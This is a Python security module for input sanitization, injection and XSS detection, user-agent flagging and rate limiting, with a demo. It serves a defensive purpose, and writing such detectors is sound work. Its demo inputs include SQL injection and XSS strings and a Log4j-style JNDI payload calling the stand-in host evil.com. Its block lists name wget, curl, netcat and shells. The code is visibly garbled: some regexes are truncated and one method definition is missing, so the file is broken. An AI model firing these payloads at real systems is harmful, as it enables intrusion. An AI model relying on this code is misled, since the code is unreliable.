#!/usr/bin/env python3 """ Comprehensive Security Module Unified security checks, input sanitization, and threat detection """ import json import re import hashlib import secrets import datetime import urllib.parse import html from typing import Dict, List, Optional, Any, Tuple, Union from dataclasses import dataclass from enum import Enum class ThreatLevel(Enum): """Security threat levels""" CRITICAL = "critical" HIGH = "high" MEDIUM = "medium" LOW = "low" INFO = "info" class AttackVector(Enum): """Common attack vectors""" INJECTION = "injection" XSS = "xss" CSRF = "csrf" PRIVILEGE_ESCALATION = "privilege_escalation" RECONNAISSANCE = "reconnaissance" DOS = "dos" BRUTE_FORCE = "brute_force" TIMING = "timing" @dataclass class SecurityAlert: """Security alert data structure""" threat_level: ThreatLevel attack_vector: AttackVector description: str source: str timestamp: str evidence: Dict[str, Any] recommendation: str blocked: bool @dataclass class SanitizationResult: """Input sanitization result""" original_input: str sanitized_input: str threats_detected: List[SecurityAlert] safe: bool modifications_made: bool risk_score: float @dataclass class SecurityPolicy: """Security policy configuration""" max_input_length: int allowed_characters: str forbidden_patterns: List[str] rate_limit_enabled: bool request_timeout: int audit_logging: bool class ComprehensiveSecurityModule: """Enterprise-grade comprehensive security module""" def __init__(self, policy: Optional[SecurityPolicy] = None): self.policy = policy or self._default_security_policy() self.alert_log = [] self.blocked_ips = set() self.rate_limiter = {} # Security patterns and signatures self.injection_patterns = self._initialize_injection_patterns() self.xss_patterns = self._initialize_xss_patterns() self.malicious_payloads = self._initialize_malicious_payloads() self.suspicious_user_agents = self._initialize_suspicious_user_agents() # Input sanitization rules self.sanitization_rules = { "html_escape": self._html_escape_input, "url_encode": self._url_encode_input, "remove_control_chars": self._remove_control_characters, "normalize_whitespace": self._normalize_whitespace, "validate_encoding": self._validate_encoding, "check_length": self._check_input_length } def sanitize_and_validate_input(self, input_data: str, input_type: str = "general", source: str = "unknown") -> SanitizationResult: """Comprehensive input sanitization and validation""" if not input_data: return SanitizationResult( original_input="", sanitized_input="", threats_detected=[], safe=True, modifications_made=False, risk_score=0.0 ) original_input = input_data current_input = input_data threats_detected = [] modifications_made = False risk_score = 0.0 # Step 1: Apply sanitization rules for rule_name, rule_func in self.sanitization_rules.items(): try: sanitized_result = rule_func(current_input) if isinstance(sanitized_result, tuple): new_input, rule_threats, rule_score = sanitized_result if new_input != current_input: modifications_made = True current_input = new_input threats_detected.extend(rule_threats) risk_score += rule_score else: if sanitized_result != current_input: modifications_made = True current_input = sanitized_result except Exception as e: threats_detected.append(SecurityAlert( threat_level=ThreatLevel.LOW, attack_vector=AttackVector.INJECTION, description=f"Sanitization rule {rule_name} failed: {e}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"rule": rule_name, "error": str(e)}, recommendation="Review sanitization rule implementation", blocked=False )) # Step 2: Detect specific attack patterns injection_threats = self._detect_injection_attacks(current_input, source) xss_threats = self._detect_xss_attacks(current_input, source) payload_threats = self._detect_malicious_payloads(current_input, source) threats_detected.extend(injection_threats) threats_detected.extend(xss_threats) threats_detected.extend(payload_threats) # Step 3: Calculate final risk score for threat in threats_detected: if threat.threat_level == ThreatLevel.CRITICAL: risk_score += 50.0 elif threat.threat_level == ThreatLevel.HIGH: risk_score += 25.0 elif threat.threat_level == ThreatLevel.MEDIUM: risk_score += 10.0 elif threat.threat_level == ThreatLevel.LOW: risk_score += 5.0 # Step 4: Determine if input is safe critical_threats = [t for t in threats_detected if t.threat_level in [ThreatLevel.CRITICAL, ThreatLevel.HIGH]] safe = len(critical_threats) == 0 and risk_score < 30.0 # Step 5: Log and block if necessary if threats_detected: self.alert_log.extend(threats_detected) # Auto-block critical threats for threat in threats_detected: if threat.threat_level == ThreatLevel.CRITICAL and source != "unknown": self.blocked_ips.add(source) threat.blocked = True # Step 6: Apply rate limiting if self.policy.rate_limit_enabled: self._apply_rate_limiting(source) return SanitizationResult( original_input=original_input, sanitized_input=current_input, threats_detected=threats_detected, safe=safe, modifications_made=modifications_made, risk_score=min(risk_score, 100.0) ) def validate_request_security(self, request_data: Dict[str, Any], headers: Dict[str, str], ip_address: str) -> List[SecurityAlert]: """Validate overall request security""" alerts = [] # Check IP blocklist if ip_address in self.blocked_ips: alerts.append(SecurityAlert( threat_level=ThreatLevel.CRITICAL, attack_vector=AttackVector.BRUTE_FORCE, description="Request from blocked IP address", source=ip_address, timestamp=datetime.datetime.now().isoformat(), evidence={"ip": ip_address}, recommendation="IP is permanently blocked", blocked=True )) return alerts # Check User-Agent user_agent = headers.get("User-Agent", "") suspicious_ua = self._detect_suspicious_user_agent(user_agent, ip_address) alerts.extend(suspicious_ua) # Check for common attack patterns in headers header_attacks = self._detect_header_attacks(headers, ip_address) alerts.extend(header_attacks) # Check request size request_size = len(json.dumps(request_data)) + sum(len(k) + len(v) for k, v in headers.items()) if request_size > self.policy.max_input_length * 10: # 10x multiplier for requests alerts.append(SecurityAlert( threat_level=ThreatLevel.MEDIUM, attack_vector=AttackVector.DOS, description="Oversized request detected", source=ip_address, timestamp=datetime.datetime.now().isoformat(), evidence={"size": request_size, "max_allowed": self.policy.max_input_length * 10}, recommendation="Reduce request size or increase limits", blocked=False )) return alerts def get_security_report(self, hours: int = 24) -> Dict[str, Any]: """Generate comprehensive security report""" cutoff_time = datetime.datetime.now() - datetime.timedelta(hours=hours) recent_alerts = [ alert for alert in self.alert_log if datetime.datetime.fromisoformat(alert.timestamp) > cutoff_time ] # Categorize alerts threat_counts = {level.value: 0 for level in ThreatLevel} attack_vector_counts = {vector.value: 0 for vector in AttackVector} for alert in recent_alerts: threat_counts[alert.threat_level.value] += 1 attack_vector_counts[alert.attack_vector.value] += 1 # Top sources top_sources = {} for alert in recent_alerts: top_sources[alert.source] = top_sources.get(alert.source, 0) + 1 # Calculate security score total_threats = len(recent_alerts) critical_count = threat_counts["critical"] high_count = threat_counts["high"] security_score = max(0, 100 - (critical_count * 20) - (high_count * 10) - (total_threats - critical_count - high_count)) return { "timeframe_hours": hours, "total_alerts": total_threats, "security_score": security_score, "threat_levels": threat_counts, "attack_vectors": attack_vector_counts, "top_sources": dict(sorted(top_sources.items(), key=lambda x: x[1], reverse=True)[:10]), "blocked_ips_count": len(self.blocked_ips), "recommendations": self._generate_security_recommendations(recent_alerts) } def _default_security_policy(self) -> SecurityPolicy: """Default security policy configuration""" return SecurityPolicy( max_input_length=10000, allowed_characters="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 .,!?-_@#$%^&*()[]{}|:;<>", forbidden_patterns=[ r']*>.*?', r'javascript:', r'eval\s*\(', r'exec\s*\(', r'system\s*\(', r'passthru\s*\(', r'shell_exec\s*\(', r'union.*select', r'drop.*table', r'insert.*into', r'delete.*from', r'update.*set', r'alert\s*\(', r'confirm\s*\(', r'prompt\s*\(' ], rate_limit_enabled=True, request_timeout=30, audit_logging=True ) def _initialize_injection_patterns(self) -> List[str]: """Initialize SQL injection and command injection patterns""" return [ r"['\"]\s*or\s*['\"][\w]*['\"]\s*=\s*['\"]", r"union\s+select", r"insert\s+into", r"delete\s+from", r"update\s+.*\s+set", r"drop\s+table", r"create\s+table", r"alter\s+table", r"exec\s*\(", r"system\s*\(", r"eval\s*\(", r"passthru\s*\(", r"shell_exec\s*\(", r"`[^`]*`", r"\$\([^)]*\)", r";\s*(rm|del|format|mkfs)", r"[|&]\s*(rm|del|format|mkfs)", r"<\?php", r"", r"javascript:", r"on\w+\s*=", r" List[str]: """Initialize known malicious payload patterns""" return [ r"cmd\.exe", r"powershell", r"/bin/bash", r"/bin/sh", r"wget\s+", r"curl\s+", r"nc\s+", r"netcat", r"telnet", r"ssh\s+", r"ftp\s+", r"tftp\s+", r"base64_decode", r"gzinflate", r"str_rot13", r"chr\s*\(", r"ord\s*\(", r"pack\s*\(", r"unpack\s*\(" ] def _initialize_suspicious_user_agents(self) -> List[str]: """Initialize suspicious user agent patterns""" return [ r"sqlmap", r"nikto", r"nmap", r"masscan", r"zap", r"burp", r"sqlninja", r"havij", r"pangolin", r"bbscan", r"netsparker", r"acunetix", r"appscan", r"webinspect", r"arachni", r"skipfish", r"w3af", r"hydra", r"medusa", r"patator", r"dirbuster", r"gobuster", r"wfuzz", r"ffuf", r"python-requests", r"curl/", r"wget/", r"perl", r"java/" ] def _detect_injection_attacks(self, input_data: str, source: str) -> List[SecurityAlert]: """Detect SQL injection and command injection attempts""" alerts = [] lower_input = input_data.lower() for pattern in self.injection_patterns: if re.search(pattern, lower_input, re.IGNORECASE): alerts.append(SecurityAlert( threat_level=ThreatLevel.HIGH, attack_vector=AttackVector.INJECTION, description=f"Injection attack pattern detected: {pattern}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"pattern": pattern, "input_sample": input_data[:100]}, recommendation="Input contains potential injection attack", blocked=False )) return alerts def _detect_xss_attacks(self, input_data: str, source: str) -> List[SecurityAlert]: """Detect XSS attack attempts""" alerts = [] lower_input = input_data.lower() for pattern in self.xss_patterns: if re.search(pattern, lower_input, re.IGNORECASE): alerts.append(SecurityAlert( threat_level=ThreatLevel.HIGH, attack_vector=AttackVector.XSS, description=f"XSS attack pattern detected: {pattern}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"pattern": pattern, "input_sample": input_data[:100]}, recommendation="Input contains potential XSS attack", blocked=False )) return alerts def _detect_malicious_payloads(self, input_data: str, source: str) -> List[SecurityAlert]: """Detect malicious payload patterns""" alerts = [] lower_input = input_data.lower() for pattern in self.malicious_payloads: if re.search(pattern, lower_input, re.IGNORECASE): alerts.append(SecurityAlert( threat_level=ThreatLevel.HIGH, attack_vector=AttackVector.INJECTION, description=f"Malicious payload detected: {pattern}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"pattern": pattern, "input_sample": input_data[:100]}, recommendation="Input contains potentially malicious payload", blocked=False )) return alerts def _detect_suspicious_user_agent(self, user_agent: str, source: str) -> List[SecurityAlert]: """Detect suspicious user agents""" alerts = [] lower_ua = user_agent.lower() for pattern in self.suspicious_user_agents: if re.search(pattern, lower_ua): alerts.append(SecurityAlert( threat_level=ThreatLevel.MEDIUM, attack_vector=AttackVector.RECONNAISSANCE, description=f"Suspicious user agent detected: {pattern}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"user_agent": user_agent, "pattern": pattern}, recommendation="Monitor this source for reconnaissance activity", blocked=False )) return alerts def _detect_header_attacks(self, headers: Dict[str, str], source: str) -> List[SecurityAlert]: """Detect attacks in HTTP headers""" alerts = [] # Check for suspicious headers suspicious_headers = [ "X-Forwarded-For", "X-Real-IP", "X-Originating-IP", "X-Remote-IP", "X-Remote-Addr" ] for header in suspicious_headers: if header in headers: alerts.append(SecurityAlert( threat_level=ThreatLevel.LOW, attack_vector=AttackVector.PRIVILEGE_ESCALATION, description=f"Suspicious header detected: {header}", source=source, timestamp=datetime.datetime.now().isoformat(), evidence={"header": header, "value": headers[header]}, recommendation="Monitor for IP spoofing attempts", blocked=False )) return alerts def _html_escape_input(self, input_data: str) -> str: """HTML escape input data""" return html.escape(input_data) def _url_encode_input(self, input_data: str) -> str: """URL encode input data""" return urllib.parse.quote(input_data) def _remove_control_characters(self, input_data: str) -> str: """Remove control characters except newline and tab""" return ''.join(char for char in input_data if char.isprintable() or char in ['\n', '\t']) def _normalize_whitespace(self, input_data: str) -> str: """Normalize whitespace characters""" return re.sub(r'\s+', ' ', input_data.strip()) def _validate_encoding(self, input_data: str) -> Tuple[str, List[SecurityAlert], float]: """Validate input encoding""" alerts = [] score = 0.0 try: # Try to detect encoding issues encoded = input_data.encode('utf-8') decoded = encoded.decode('utf-8') if decoded != input_data: alerts.append(SecurityAlert( threat_level=ThreatLevel.LOW, attack_vector=AttackVector.INJECTION, description="Input encoding anomaly detected", source="encoding_validation", timestamp=datetime.datetime.now().isoformat(), evidence={"original_length": len(input_data), "decoded_length": len(decoded)}, recommendation="Check for encoding-based attacks", blocked=False )) score += 5.0 return decoded, alerts, score except UnicodeError as e: alerts.append(SecurityAlert( threat_level=ThreatLevel.MEDIUM, attack_vector=AttackVector.INJECTION, description=f"Invalid encoding detected: {e}", source="encoding_validation", timestamp=datetime.datetime.now().isoformat(), evidence={"error": str(e)}, recommendation="Invalid input encoding", blocked=False )) return "", alerts, 15.0 def _check_input_length(self, input_data: str) -> Tuple[str, List[SecurityAlert], float]: """Check input length against policy""" alerts = [] score = 0.0 if len(input_data) > self.policy.max_input_length: alerts.append(SecurityAlert( threat_level=ThreatLevel.MEDIUM, attack_vector=AttackVector.DOS, description="Input exceeds maximum length", source="length_validation", timestamp=datetime.datetime.now().isoformat(), evidence={"length": len(input_data), "max_allowed": self.policy.max_input_length}, recommendation="Input too long", blocked=False )) score += 10.0 return input_data[:self.policy.max_input_length], alerts, score def _apply_rate_limiting(self, source: str) -> None: """Apply rate limiting to prevent abuse""" current_time = datetime.datetime.now().timestamp() if source not in self.rate_limiter: self.rate_limiter[source] = [] # Remove old requests (older than 1 hour) self.rate_limiter[source] = [ req_time for req_time in self.rate_limiter[source] if current_time - req_time < 3600 ] # Add current request self.rate_limiter[source].append(current_time) # Check if rate limit exceeded (more than 100 requests per hour) if len(self.rate_limiter[source]) > 100: self.blocked_ips.add(source) def _generate_security_recommendations(self, alerts: List[SecurityAlert]) -> List[str]: """Generate security recommendations based on alerts""" recommendations = [] if len(alerts) > 50: recommendations.append("High volume of security alerts - consider increasing protection levels") critical_count = len([a for a in alerts if a.threat_level == ThreatLevel.CRITICAL]) if critical_count > 0: recommendations.append(f"{critical_count} critical threats detected - immediate action required") # Check for common attack patterns attack_types = set(alert.attack_vector for alert in alerts) if AttackVector.INJECTION in attack_types: recommendations.append("Injection attacks detected - review input sanitization") if AttackVector.XSS in attack_types: recommendations.append("XSS attacks detected - implement stronger output encoding") if AttackVector.RECONNAISSANCE in attack_types: recommendations.append("Reconnaissance activity detected - consider IP blocking") return recommendations def demo_comprehensive_security(): """Demonstrate comprehensive security capabilities""" print("=== Comprehensive Security Module Demo ===\n") security_module = ComprehensiveSecurityModule() # Demo 1: Input sanitization print("--- Input Sanitization Demo ---") test_inputs = [ "Normal input text", "", "'; DROP TABLE users; --", "javascript:alert('xss')", "Hello\x00\x01\x02world", "A" * 15000, # Oversized input "Normal user input with special chars: @#$%^&*()", "${jndi:ldap://evil.com/a}", # Log4j-like payload ] for test_input in test_inputs: result = security_module.sanitize_and_validate_input( test_input, input_type="user_input", source="demo_user" ) print(f"Input: {test_input[:50]}...") print(f"Safe: {'✅' if result.safe else '❌'}") print(f"Risk Score: {result.risk_score:.1f}") print(f"Threats Detected: {len(result.threats_detected)}") print(f"Modified: {'✅' if result.modifications_made else '❌'}") if result.threats_detected: for threat in result.threats_detected[:2]: # Show top 2 print(f" {threat.threat_level.value.upper()}: {threat.description}") print() # Demo 2: Request validation print("--- Request Validation Demo ---") test_request = { "data": "test data" } test_headers = { "User-Agent": "sqlmap/1.0", "X-Forwarded-For": "192.168.1.100", "Content-Type": "application/json" } alerts = security_module.validate_request_security( test_request, test_headers, "192.168.1.50" ) print(f"Security alerts: {len(alerts)}") for alert in alerts: print(f" {alert.threat_level.value.upper()}: {alert.description}") print() # Demo 3: Security report print("--- Security Report Demo ---") report = security_module.get_security_report(hours=1) print(f"Security Score: {report['security_score']}/100") print(f"Total Alerts: {report['total_alerts']}") print(f"Threat Levels: {report['threat_levels']}") print(f"Attack Vectors: {report['attack_vectors']}") if report['recommendations']: print("Recommendations:") for rec in report['recommendations']: print(f" 💡 {rec}") if __name__ == "__main__": demo_comprehensive_security()